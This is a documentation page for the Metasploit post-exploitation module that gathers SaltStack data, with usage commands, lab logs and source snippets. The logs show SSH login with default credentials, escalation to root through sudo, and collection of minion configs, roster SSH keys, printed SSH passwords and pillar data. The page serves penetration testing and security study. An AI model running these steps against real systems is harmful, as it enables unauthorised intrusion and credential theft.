SaltStack Salt Information Gatherer - Metasploit


This page contains detailed information about how to use the post/multi/gather/saltstack_salt metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: SaltStack Salt Information Gatherer
Module: post/multi/gather/saltstack_salt
Source code: modules/post/multi/gather/saltstack_salt.rb
Disclosure date: -
Last modification time: 2021-05-15 09:38:15 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module gathers information from SaltStack Salt masters and minions. Data gathered from minions: 1. salt minion config file Data gathered from masters: 1. minion list (denied, pre, rejected, accepted) 2. minion hostname/ip/os (depending on module settings) 3. SLS 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed 5. minion config files 6. pillar data

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/gather/saltstack_salt

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/gather/saltstack_salt
msf post(saltstack_salt) > show options
    ... show and set options ...
msf post(saltstack_salt) > set SESSION session-id
msf post(saltstack_salt) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/gather/saltstack_salt")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Vulnerable Application

This module gathers data from salt stack minions and masters.

Data gathered from minions:

  1. salt minion config file

Data gathered from masters:

  1. minion list (denied, pre, rejected, accepted)
  2. minion hostname/ip/os (depending on module settings)
  3. SLS
  4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed
  5. minion config files
  6. pillar data

Verification Steps

  1. Install salt and configure it
  2. Start msfconsole
  3. Get a session with permissions required (root typically)
  4. Do: use post/multi/gather/saltstack_salt
  5. Do: set session #
  6. Do: run
  7. You should get all the salt stack info

Options

GETHOSTNAME

Gather hostname from the minions. Defaults to true

GETIP

Gather IP from the minions. Defaults to true

GETOS

Gather OS from the minions. Defaults to true

MINIONS

Which minions to gather info from. Defaults to * (all)

TIMEOUT

Timeout value for running the salt commands. Bigger salt networks will need a bigger value. Defaults to 120

Scenarios

Minion 3002.2 on Ubuntu 20.04

Setup

[*] Processing salt.rb for ERB directives.
resource (salt.rb)> use auxiliary/scanner/ssh/ssh_login
resource (salt.rb)> set username salt
username => salt
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> set rhosts 333.333.3.333
rhosts => 333.333.3.333
resource (salt.rb)> run
[+] 333.333.3.333:22 - Success: 'salt:salt' 'uid=1000(salt) gid=1000(salt) groups=1000(salt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd) Linux salt-minion 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:34863 -> 333.333.3.333:22) at 2021-04-10 12:50:12 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (salt.rb)> use post/multi/manage/sudo
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> run
[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `salt'.
[+] SUDO: Root shell secured.
[*] Post module execution completed

Module Run

resource (salt.rb)> use post/multi/gather/saltstack_salt
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set verbose true
verbose => true
resource (salt.rb)> run
[!] SESSION may not be compatible with this module.
[*] Looking for salt minion config files
[+] Minion master: 444.444.4.444
[+] 333.333.3.333:22 - minion file successfully retrieved and saved on /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin
[*] Post module execution completed
msf6 post(multi/gather/saltstack_salt) > cat /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin
[*] exec: cat /root/.msf4/loot/20210410125036_default_333.333.3.333_saltstack_salt_minion_561296.bin

---
master: 444.444.4.444

Minion 3003 on Windows Server 2012

msf6 post(multi/gather/saltstack_salt) > rexploit
[*] Reloading module...

[!] SESSION may not be compatible with this module.
[*] Looking for salt minion config files
[+] Minion master: 1.1.1.1
[+] 2.2.2.2:49299 - minion file successfully retrieved and saved to /home/h00die/.msf4/loot/20210502093836_default_2.2.2.2_saltstack_minion_337783.bin
[*] Looking for salt minion config files
[+] Minion master: 1.1.1.1
[+] 2.2.2.2:49299 - minion file successfully retrieved and saved to /home/h00die/.msf4/loot/20210502093837_default_2.2.2.2_saltstack_minion_063036.bin
[*] Post module execution completed

Master 3002.2 on Ubuntu 20.04

Setup

[*] Processing salt.rb for ERB directives.
resource (salt.rb)> use auxiliary/scanner/ssh/ssh_login
resource (salt.rb)> set username salt
username => salt
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> set rhosts 444.444.4.444
rhosts => 444.444.4.444
resource (salt.rb)> run
[+] 444.444.4.444:22 - Success: 'salt:salt' 'uid=1000(salt) gid=1000(salt) groups=1000(salt),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd) Linux salt-master 5.4.0-58-generic #64-Ubuntu SMP Wed Dec 9 08:16:25 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (1.1.1.1:35097 -> 444.444.4.444:22) at 2021-04-10 12:11:29 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (salt.rb)> use post/multi/manage/sudo
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set password salt
password => salt
resource (salt.rb)> run
[*] SUDO: Attempting to upgrade to UID 0 via sudo
[*] Sudoing with password `salt'.
[+] SUDO: Root shell secured.
[*] Post module execution completed

Module Run

resource (salt.rb)> use post/multi/gather/saltstack_salt
resource (salt.rb)> set session 1
session => 1
resource (salt.rb)> set verbose true
verbose => true
resource (salt.rb)> run
[!] SESSION may not be compatible with this module.
[*] Attempting to list minions
[*] minions:
- mac_minion
- salt-minion
- window-salt-minion
minions_denied: []
minions_pre: []
minions_rejected: []
[+] 333.333.3.333:22 - minion file successfully retrieved and saved to /.msf4/loot/20210502081041_default_333.333.3.333_saltstack_minion_980449.bin
[+] Minions List
============

 Status    Minion Name
 ------    -----------
 Accepted  mac_minion
 Accepted  salt-minion
 Accepted  window-salt-minion

[*] Gathering data from minions (this can take some time)
[*] salt-minion:
  network.get_hostname: salt-minion
  network.interfaces:
    ens160:
      hwaddr: 00:0c:29:00:00:00
      inet:
      - address: 444.444.4.444
        broadcast: 192.168.2.255
        label: ens160
        netmask: 255.255.255.0
      inet6:
      - address: fe80::20c:29ff:fe87:95b
        prefixlen: '64'
        scope: link
      up: true
    lo:
      hwaddr: 00:00:00:00:00:00
      inet:
      - address: 127.0.0.1
        broadcast: null
        label: lo
        netmask: 255.0.0.0
      inet6:
      - address: ::1
        prefixlen: '128'
        scope: host
      up: true
  status.version: 'Linux version 5.4.0-72-generic (buildd@lcy01-amd64-019) (gcc version
    9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021'
  system.get_system_info: "Traceback (most recent call last):\n  File \"/usr/lib/python3/dist-packages/salt/minion.py\",
    line 2083, in _thread_multi_return\n    return_data = minion_instance._execute_job_function(\n
    \ File \"/usr/lib/python3/dist-packages/salt/minion.py\", line 1846, in _execute_job_function\n
    \   return_data = self.executors[fname](opts, data, func, args, kwargs)\n  File
    \"/usr/lib/python3/dist-packages/salt/executors/direct_call.py\", line 12, in
    execute\n    return func(*args, **kwargs)\nTypeError: 'str' object is not callable\n"
mac_minion:
  network.get_hostname: h00dies-MBP.domain
  network.interfaces:
    awdl0:
      hwaddr: ca:6a:47:00:00:00
      inet6:
      - address: fe80::c86a:47ff:fe4a:39d2
        prefixlen: '64'
        scope: '0x9'
      up: true
    bridge0:
      hwaddr: 82:0f:16:00:00:00
      up: true
    en0:
      hwaddr: 80:e6:50:00:00:00
      inet:
      - address: 222.222.2.22
        broadcast: 192.168.2.255
        netmask: 255.255.255.0
      inet6:
      - address: fe80::ef:6155:1f8b:98df
        prefixlen: '64'
        scope: null
      up: true
    en1:
      hwaddr: 82:0f:16:00:00:00
      up: true
    en2:
      hwaddr: 82:0f:16:00:00:00
      up: true
    gif0:
      up: false
    llw0:
      hwaddr: ca:6a:47:00:00:00
      inet6:
      - address: fe80::c86a:47ff:fe4a:39d2
        prefixlen: '64'
        scope: '0xa'
      up: true
    lo0:
      inet:
      - address: 127.0.0.1
        netmask: 255.0.0.0
      inet6:
      - address: ::1
        prefixlen: '128'
        scope: null
      - address: fe80::1
        prefixlen: '64'
        scope: '0x1'
      up: true
    p2p0:
      hwaddr: 02:e6:50:00:00:00
      up: true
    stf0:
      up: false
  status.version: This method is unsupported on the current operating system!
  system.get_system_info: "Traceback (most recent call last):\n  File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/minion.py\",
    line 2099, in _thread_multi_return\n    function_name, function_args, executors,
    opts, data\n  File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/minion.py\",
    line 1861, in _execute_job_function\n    return_data = self.executors[fname](opts,
    data, func, args, kwargs)\n  File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
    line 1235, in __call__\n    return self.loader.run(run_func, *args, **kwargs)\n
    \ File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
    line 2268, in run\n    return self._last_context.run(self._run_as, _func_or_method,
    *args, **kwargs)\n  File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/loader.py\",
    line 2283, in _run_as\n    return _func_or_method(*args, **kwargs)\n  File \"/opt/salt/lib/python3.7/site-packages/salt-3003-py3.7.egg/salt/executors/direct_call.py\",
    line 12, in execute\n    return func(*args, **kwargs)\nTypeError: 'str' object
    is not callable\n"
window-salt-minion:
  network.get_hostname: WIN-EDKFSE5QPAB
  network.interfaces:
    Intel(R) 82574L Gigabit Network Connection:
      hwaddr: 00:0C:29:00:00:00
      inet:
      - address: 555.555.5.555
        broadcast: 192.168.2.255
        gateway: 0.0.0.0
        label: Intel(R) 82574L Gigabit Network Connection
        netmask: 255.255.255.0
      inet6:
      - address: fe80::48f2:f6fd:3dc2:a4eb
        gateway: ''
      up: true
    Software Loopback Interface 1:
      hwaddr: ':::::'
      inet:
      - address: 127.0.0.1
        broadcast: 127.255.255.255
        gateway: ''
        label: Software Loopback Interface 1
        netmask: 255.0.0.0
      inet6:
      - address: ::1
        gateway: ''
      up: true
  status.version: "Traceback (most recent call last):\n  File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\minion.py\",
    line 2099, in _thread_multi_return\n    function_name, function_args, executors,
    opts, data\n  File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\minion.py\",
    line 1861, in _execute_job_function\n    return_data = self.executors[fname](opts,
    data, func, args, kwargs)\n  File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
    line 1235, in __call__\n    return self.loader.run(run_func, *args, **kwargs)\n
    \ File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
    line 2268, in run\n    return self._last_context.run(self._run_as, _func_or_method,
    *args, **kwargs)\n  File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\loader.py\",
    line 2283, in _run_as\n    return _func_or_method(*args, **kwargs)\n  File \"c:\\salt\\bin\\lib\\site-packages\\salt-3003-py3.7.egg\\salt\\executors\\direct_call.py\",
    line 12, in execute\n    return func(*args, **kwargs)\nTypeError: 'str' object
    is not callable\n"
  system.get_system_info:
    bios_caption: 'PhoenixBIOS 4.0 Release 6.0     '
    bios_description: 'PhoenixBIOS 4.0 Release 6.0     '
    bios_details:
    - INTEL  - 6040000
    - 'PhoenixBIOS 4.0 Release 6.0     '
    bios_manufacturer: Phoenix Technologies LTD
    bios_version: INTEL  - 6040000
    bootup_state: Normal boot
    caption: WIN-EDKFSE5QPAB
    chassis_bootup_state: Safe
    chassis_sku_number: null
    description: ''
    dns_hostname: WIN-EDKFSE5QPAB
    domain: WORKGROUP
    domain_role: Standalone Server
    hardware_manufacturer: VMware, Inc.
    hardware_model: VMware Virtual Platform
    hardware_serial: VMware-56 4d 85 da 18 47 2c 63-c7 71 42 6b ab 7a c9 f1
    install_date: '2019-06-18 18:28:30'
    last_boot: '2021-04-30 14:21:48'
    name: WIN-EDKFSE5QPAB
    network_server_mode_enabled: true
    organization: ''
    os_architecture: 64-bit
    os_manufacturer: Microsoft Corporation
    os_name: Microsoft Windows Server 2012 Standard
    os_type: Server
    os_version: 6.2.9200
    part_of_domain: false
    pc_system_type: Desktop
    power_state: 0
    primary: true
    processor_cores: 2
    processor_manufacturer: GenuineIntel
    processor_max_clock_speed: 2600MHz
    processors: 2
    processors_logical: 2
    registered_user: Windows User
    status: OK
    system_directory: C:\Windows\system32
    system_drive: 'C:'
    system_type: x64-based PC
    thermal_state: Safe
    total_physical_memory: 4.000GB
    total_physical_memory_raw: '4294430720'
    users: 1
    windows_directory: C:\Windows
    workgroup: WORKGROUP
[+] 333.333.3.333:22 - minion data gathering successfully retrieved and saved to /.msf4/loot/20210502081051_default_333.333.3.333_saltstack_minion_337797.bin
[+] Found minion: salt-minion (444.444.4.444) - Linux version 5.4.0-72-generic (buildd@lcy01-amd64-019) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021
[+] Found minion: h00dies-MBP.domain (222.222.2.22) - 
[+] Found minion: WIN-EDKFSE5QPAB (555.555.5.555) - 6.2.9200
[*] Showing SLS
[+] 333.333.3.333:22 - SLS output successfully retrieved and saved to /.msf4/loot/20210502081057_default_333.333.3.333_saltstack_sls_969146.txt
[*] Loading roster
[+] Found SSH minion: web1 (192.168.42.1)
[+] Found SSH minion: web2 (192.168.42.2)
[+]   SSH key /tmp/id_rsa password hello
[-]   Unable to find salt-ssh priv key /tmp/id_rsa
[+] Found SSH minion: web3 (192.168.42.3)
[-]   Unable to find salt-ssh priv key /tmp/id_rsa2
[*] Looking for salt minion config files
[+] 333.333.3.333:22 - roster file successfully retrieved and saved to /.msf4/loot/20210502081101_default_333.333.3.333_saltstack_roster_292921.bin
[*] Gathering pillar data
[*] salt-minion:
  info: some data
mac_minion:
  info: some data
window-salt-minion:
  info: some data
[+] 333.333.3.333:22 - pillar data gathering successfully retrieved and saved to /.msf4/loot/20210502081106_default_333.333.3.333_saltstack_pillar_899591.bin
[*] Post module execution completed
msf6 post(multi/gather/saltstack_salt) > hosts

Hosts
=====

address        mac                name                    os_name                                 os_flavor                                             os_sp  purpose  info  comments
-------        ---                ----                    -------                                 ---------                                             -----  -------  ----  --------
222.222.2.22   80:e6:50:00:00:00  h00dies-MBP.domain      osx                                                                                                                 SaltStack minion to 333.333.3.333
333.333.3.333                                             linux                                                                                                               
444.444.4.444  00:0c:29:00:00:00  salt-minion                                                     Linux version 5.4.0-72-generic (buildd@lcy01-amd64-01                        SaltStack minion to 333.333.3.333
555.555.5.555  00:0C:29:00:00:00  WIN-EDKFSE5QPAB         Microsoft Windows Server 2012 Standard  6.2.9200                                                     Server         SaltStack minion to 333.333.3.333
192.168.42.1                      web1                                                                                                                                        SaltStack ssh minion to 333.333.3.333
192.168.42.2                      web2                    Unknown                                                                                              device         SaltStack ssh minion to 333.333.3.333
192.168.42.3                      web3                                                                                                                                        SaltStack ssh minion to 333.333.3.333

Go back to menu.

Msfconsole Usage

Here is how the multi/gather/saltstack_salt post exploitation module looks in the msfconsole:

msf6 > use post/multi/gather/saltstack_salt

msf6 post(multi/gather/saltstack_salt) > show info

       Name: SaltStack Salt Information Gatherer
     Module: post/multi/gather/saltstack_salt
   Platform: 
       Arch: 
       Rank: Normal

Provided by:
  h00die
  c2Vlcgo

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  GETHOSTNAME  true             no        Gather Hostname from minions
  GETIP        true             no        Gather IP from minions
  GETOS        true             no        Gather OS from minions
  MINIONS      *                yes       Minions Target
  SESSION                       yes       The session to run this module on.
  TIMEOUT      120              yes       Timeout for salt commands to run

Description:
  This module gathers information from SaltStack Salt masters and 
  minions. Data gathered from minions: 1. salt minion config file Data 
  gathered from masters: 1. minion list (denied, pre, rejected, 
  accepted) 2. minion hostname/ip/os (depending on module settings) 3. 
  SLS 4. roster, any SSH keys are retrieved and saved to creds, SSH 
  passwords printed 5. minion config files 6. pillar data

Module Options

This is a complete list of options available in the multi/gather/saltstack_salt post exploitation module:

msf6 post(multi/gather/saltstack_salt) > show options

Module options (post/multi/gather/saltstack_salt):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   GETHOSTNAME  true             no        Gather Hostname from minions
   GETIP        true             no        Gather IP from minions
   GETOS        true             no        Gather OS from minions
   MINIONS      *                yes       Minions Target
   SESSION                       yes       The session to run this module on.
   TIMEOUT      120              yes       Timeout for salt commands to run

Advanced Options

Here is a complete list of advanced options supported by the multi/gather/saltstack_salt post exploitation module:

msf6 post(multi/gather/saltstack_salt) > show advanced

Module advanced options (post/multi/gather/saltstack_salt):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the multi/gather/saltstack_salt module can do:

msf6 post(multi/gather/saltstack_salt) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the multi/gather/saltstack_salt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/gather/saltstack_salt) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to process pillar command output

Here is a relevant code snippet related to the "Unable to process pillar command output" error message:

49:	      vprint_status(out)
50:	      results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
51:	      store_path = store_loot('saltstack_pillar_data_gather', 'application/x-yaml', session, results.to_yaml, 'pillar_gather.yaml', 'SaltStack Salt Pillar Gather')
52:	      print_good("#{peer} - pillar data gathering successfully retrieved and saved to #{store_path}")
53:	    rescue Psych::SyntaxError
54:	      print_error('Unable to process pillar command output')
55:	      return
56:	    end
57:	  end
58:	
59:	  def gather_minion_data

No results returned. Try increasing the TIMEOUT or decreasing the minions being checked

Here is a relevant code snippet related to the "No results returned. Try increasing the TIMEOUT or decreasing the minions being checked" error message:

73:	    commas = ',' * (command.length - 1) # we need to provide empty arguments for each command
74:	    command = "salt '#{datastore['MINIONS']}' --output=yaml #{command.join(',')} #{commas}"
75:	    begin
76:	      out = cmd_exec(command, nil, datastore['TIMEOUT'])
77:	      if out == '' || out.nil?
78:	        print_error('No results returned. Try increasing the TIMEOUT or decreasing the minions being checked')
79:	        return
80:	      end
81:	      vprint_status(out)
82:	      results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
83:	      store_path = store_loot('saltstack_minion_data_gather', 'application/x-yaml', session, results.to_yaml, 'minion_data_gather.yaml', 'SaltStack Salt Minion Data Gather')

Unable to process gather command output

Here is a relevant code snippet related to the "Unable to process gather command output" error message:

81:	      vprint_status(out)
82:	      results = YAML.safe_load(out, [Symbol]) # during testing we discovered at times Symbol needs to be loaded
83:	      store_path = store_loot('saltstack_minion_data_gather', 'application/x-yaml', session, results.to_yaml, 'minion_data_gather.yaml', 'SaltStack Salt Minion Data Gather')
84:	      print_good("#{peer} - minion data gathering successfully retrieved and saved to #{store_path}")
85:	    rescue Psych::SyntaxError
86:	      print_error('Unable to process gather command output')
87:	      return
88:	    end
89:	    return if results == false || results.nil?
90:	    return if results.include?('Salt request timed out.') || results.include?('Minion did not return.')
91:

salt-key not present on system

Here is a relevant code snippet related to the "salt-key not present on system" error message:

135:	
136:	  def list_minions
137:	    # pull minions from a master
138:	    print_status('Attempting to list minions')
139:	    unless command_exists?('salt-key')
140:	      print_error('salt-key not present on system')
141:	      return
142:	    end
143:	    begin
144:	      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
145:	      vprint_status(out)

Unable to load salt-key -L data

Here is a relevant code snippet related to the "Unable to load salt-key -L data" error message:

143:	    begin
144:	      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
145:	      vprint_status(out)
146:	      minions = YAML.safe_load(out)
147:	    rescue Psych::SyntaxError
148:	      print_error('Unable to load salt-key -L data')
149:	      return
150:	    end
151:	
152:	    tbl = Rex::Text::Table.new(
153:	      'Header' => 'Minions List',

salt not found on system

Here is a relevant code snippet related to the "salt not found on system" error message:

196:	    list_minions
197:	    gather_minion_data if datastore['GETOS'] || datastore['GETHOSTNAME'] || datastore['GETIP']
198:	
199:	    # get sls files
200:	    unless command_exists?('salt')
201:	      print_error('salt not found on system')
202:	      return
203:	    end
204:	    print_status('Showing SLS')
205:	    output = cmd_exec('salt', "'#{datastore['MINIONS']}' state.show_sls '*'", datastore['TIMEOUT'])
206:	    store_path = store_loot('saltstack_sls', 'text/plain', session, output, 'sls.txt', 'SaltStack Salt Master SLS Output')

Unable to load <CONFIG>

Here is a relevant code snippet related to the "Unable to load <CONFIG>" error message:

214:	      next unless file?(config)
215:	
216:	      begin
217:	        minions = YAML.safe_load(read_file(config))
218:	      rescue Psych::SyntaxError
219:	        print_error("Unable to load #{config}")
220:	        next
221:	      end
222:	      store_path = store_loot('saltstack_roster', 'application/x-yaml', session, minion.to_yaml, 'roster.yaml', 'SaltStack Salt Roster File')
223:	      print_good("#{peer} - roster file successfully retrieved and saved to #{store_path}")
224:	      next if minions.nil?

Unable to find salt-ssh priv key <PRIV>

Here is a relevant code snippet related to the "Unable to find salt-ssh priv key <PRIV>" error message:

275:	          create_credential_and_login(cred)
276:	          next
277:	        end
278:	
279:	        unless file?(priv)
280:	          print_error("  Unable to find salt-ssh priv key #{priv}")
281:	          next
282:	        end
283:	        input = read_file(priv)
284:	        store_path = store_loot('ssh_key', 'plain/txt', session, input, 'salt-ssh.rsa', 'SaltStack Salt SSH Private Key')
285:	        print_good("  #{priv} stored to #{store_path}")

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • h00die
  • c2Vlcgo

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.